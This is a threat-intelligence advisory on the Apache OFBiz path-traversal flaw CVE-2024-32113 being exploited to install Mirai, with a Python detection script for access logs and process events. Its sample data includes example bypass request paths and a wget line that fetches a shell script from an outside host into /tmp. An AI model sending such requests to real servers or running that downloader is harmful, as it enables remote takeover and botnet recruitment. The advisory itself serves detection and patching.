[TIMESTAMP: 2026-04-06 05:02 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: CRITICAL]

CVE-2024-32113: Apache OFBiz RCE Exploited for Mirai Botnet

CRITICAL | Vulnerabilities | #CVE-2024-32113 #ApacheOFBiz #Mirai
AI-Assisted Analysis
READ_TIME: 3 min read
// executive briefing tl;dr
  • [01] Immediate impact: Unauthenticated attackers are gaining full system control and recruiting vulnerable servers into automated botnets.
  • [02] Affected systems: All Apache OFBiz installations running versions prior to 18.12.13 are susceptible to this path traversal flaw.
  • [03] Remediation: Organizations must update to Apache OFBiz 18.12.13 immediately to prevent automated exploitation and malware persistence.

Recent threat intelligence confirms that attackers are actively targeting a critical CVE in Apache Open For Business (OFBiz), an open-source Enterprise Resource Planning (ERP) suite. According to SANS Internet Storm Center, exploitation of CVE-2024-32113 has transitioned from theoretical proof-of-concept to active deployment of the Mirai malware family. This vulnerability, which carries a CVSS score of 9.8, represents a significant risk to organizations relying on unpatched ERP infrastructure.

Technical Analysis: Mirai botnet Apache OFBiz exploitation

The vulnerability is rooted in a path traversal flaw in the web interface of Apache OFBiz. The software failed to canonicalize the request URI before applying its security filter, so attackers could craft request paths that the filter and the controller interpreted differently. The primary TTP observed is a crafted HTTP request to the /control/forgotPassword endpoint, a request that legitimately needs no session. By appending a semicolon (which a servlet container treats as the start of a path parameter) followed by a further path segment, or by using traversal and encoding variants to the same effect, the attacker gets the filter to authorize the request as forgotPassword while the controller resolves the segment after the semicolon and reaches functionality that should require authentication. The end result is arbitrary code execution with the privileges of the OFBiz process.

Once the RCE is achieved, the automated exploitation scripts typically attempt to download and execute a shell script. These scripts are designed to fetch various Mirai binaries compiled for different CPU architectures (e.g., ARM, MIPS, x86). This activity effectively recruits the compromised server into a botnet, which is then used for launching DDoS attacks or further network scanning. Because ERP systems often have significant outbound bandwidth and are rarely rebooted, they are ideal candidates for maintaining botnet persistence.

How to detect CVE-2024-32113 exploit attempts

Defenders can identify exploitation attempts by monitoring web server access logs for unusual URI patterns. Security teams should prioritize searching for requests containing /control/forgotPassword; (and URL-encoded variants such as %3B, or dot-segment sequences) where non-standard characters are used to hide the real target path. Search the raw Tomcat or reverse-proxy access logs rather than normalized SIEM fields, since normalization can erase exactly the characters that matter. Furthermore, outbound connections from the OFBiz host to unfamiliar addresses on ports commonly used for payload delivery, such as 80, 443 or 8080, should be investigated; an ERP application server normally initiates few such connections on its own.

Automating the detection process by ingesting these logs into a SIEM allows for real-time alerting. An effective IoC strategy correlates these web requests with subsequent suspicious process execution on the same host, such as wget or curl commands fetching binaries from remote servers within seconds of the request. A modern EDR solution should also flag /bin/sh, wget or curl spawned as a child of the java process running OFBiz, as this is a high-confidence indicator of compromise.
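The following Python script is an added example, not code from the original article or from the Apache OFBiz project. It serves both the technical analysis above (it shows how the request name a naive filter sees diverges from the canonical path once the semicolon path parameter and encoding are stripped) and the detection guidance (it scans constructed access-log lines for that divergence and correlates hits with constructed process-start events). The public request set, the "adminView" target segment, the IP addresses and every log line and process event are constructed for illustration; the heuristics are an assumption about what is worth alerting on, not a published signature.

```python
"""Path-confusion detection for CVE-2024-32113-style requests.

Added example; not code from the original article or from Apache OFBiz.
All sample log lines, process events, IPs and endpoint names are constructed.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# OFBiz-style request names reachable without a session (assumed subset).
PUBLIC_REQUESTS = {"forgotPassword", "login", "logout", "main"}

# Combined access-log format (matches the constructed samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def normalize_path(uri: str) -> str:
    """Aggressive canonicalization for detection: drop the query string,
    percent-decode each segment, strip ';param' servlet path parameters and
    resolve '.' / '..'. This is what a check must compare against; a check
    that keys on the raw URI text sees something else."""
    path = uri.split("?", 1)[0]
    out = []
    for seg in path.split("/"):
        seg = unquote(seg).split(";", 1)[0]   # ';' starts a path parameter
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def naive_request_name(uri: str) -> str:
    """Request name a filter keyed on the raw '/control/<name>' text sees:
    the segment after 'control', cut at the first ';', '/' or '?'."""
    m = re.search(r"/control/([^/;?]*)", uri)
    return m.group(1) if m else ""


def is_path_confusion(uri: str) -> bool:
    """True when the raw URI names a public request but the canonical path
    carries further segments (the ';/' trick), or when the raw path shows
    path parameters, dot segments or encoded delimiters under /control/."""
    name = naive_request_name(uri)
    parts = normalize_path(uri).split("/")
    if "control" not in parts:
        return False
    after = parts[parts.index("control") + 1:]
    if name in PUBLIC_REQUESTS and len(after) > 1:
        return True
    raw_path = uri.split("?", 1)[0]
    return bool(re.search(r";|/\.\./|%2[fF]|%2[eE]|%3[bB]", raw_path))


def parse_log(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    return entry


def scan_access_log(lines):
    """Return parsed entries whose URI shows the confusion pattern."""
    hits = []
    for line in lines:
        entry = parse_log(line)
        if entry and is_path_confusion(entry["uri"]):
            entry["canonical"] = normalize_path(entry["uri"])
            hits.append(entry)
    return hits


def correlate(hits, proc_events, window=timedelta(seconds=60)):
    """Pair each suspicious request with a shell or downloader spawned by the
    java (OFBiz) process within `window` after it: a high-confidence IoC."""
    downloader = re.compile(r"\b(wget|curl|sh|bash)\b")
    findings = []
    for h in hits:
        for p in proc_events:
            if (p["parent"] == "java" and downloader.search(p["cmdline"])
                    and h["ts"] <= p["ts"] <= h["ts"] + window):
                findings.append({"src": h["ip"], "uri": h["uri"],
                                 "canonical": h["canonical"],
                                 "process": p["cmdline"]})
    return findings


# Constructed sample data (not real traffic; 'adminView' is a placeholder).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Apr/2026:04:58:11 +0000] "POST /webtools/control/forgotPassword;/adminView HTTP/1.1" 200 1833',
    '198.51.100.9 - - [06/Apr/2026:04:58:20 +0000] "GET /webtools/control/main HTTP/1.1" 200 4201',
    '203.0.113.7 - - [06/Apr/2026:04:59:02 +0000] "GET /webtools/control/forgotPassword%3b/adminView HTTP/1.1" 200 1833',
    '192.0.2.4 - - [06/Apr/2026:05:00:30 +0000] "GET /webtools/control/login?USERNAME=a HTTP/1.1" 302 0',
]
SAMPLE_PROCS = [  # constructed EDR-style process-start events
    {"ts": datetime.strptime("06/Apr/2026:04:58:13 +0000", TS_FMT), "parent": "java",
     "cmdline": "/bin/sh -c wget http://203.0.113.7/bins.sh -O /tmp/bins.sh"},
    {"ts": datetime.strptime("06/Apr/2026:04:58:40 +0000", TS_FMT), "parent": "cron",
     "cmdline": "/usr/bin/curl https://updates.example/health"},
]

if __name__ == "__main__":
    for f in correlate(scan_access_log(SAMPLE_LOG), SAMPLE_PROCS):
        print(f"{f['src']} {f['uri']} -> {f['canonical']} | {f['process']}")
```

The `len(after) > 1` rule is a heuristic: it fires on any public request name followed by an extra path segment, which is the shape of the observed attacks but could also match legitimate view overrides in some deployments, so tune PUBLIC_REQUESTS to your controller configuration before alerting on it alone. The correlation step is what turns a noisy URI match into an actionable finding.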

Apache OFBiz 18.12.13 patch guidance

The most effective mitigation is the immediate application of the official security update. Apache released version 18.12.13 specifically to address this path traversal issue; treat it as the minimum and deploy the latest 18.12.x release, since the project has continued to harden the same request-handling path. Organizations should verify their current versioning and prioritize the update on all internet-facing instances. If an immediate update is not feasible, the SOC should implement strict ingress filtering at the reverse proxy or firewall: restrict the /control/ servlet path (and the /webtools/ back-office application in particular) to trusted source networks, or at least deny requests to the forgotPassword request that contain a semicolon, encoded delimiter or dot segment. These measures buy time; they are not a substitute for the patch.

In addition to patching, security administrators should audit their systems for existing signs of compromise. Check for unexpected files in /tmp or /var/run (the usual drop locations for the downloaded shell script and Mirai binaries), review active network connections and listening sockets, and look for persistence mechanisms such as new cron entries or init scripts. Given that the vulnerability allows for unauthenticated code execution, assuming a breach has occurred on any unpatched, internet-exposed system is a prudent defensive posture.
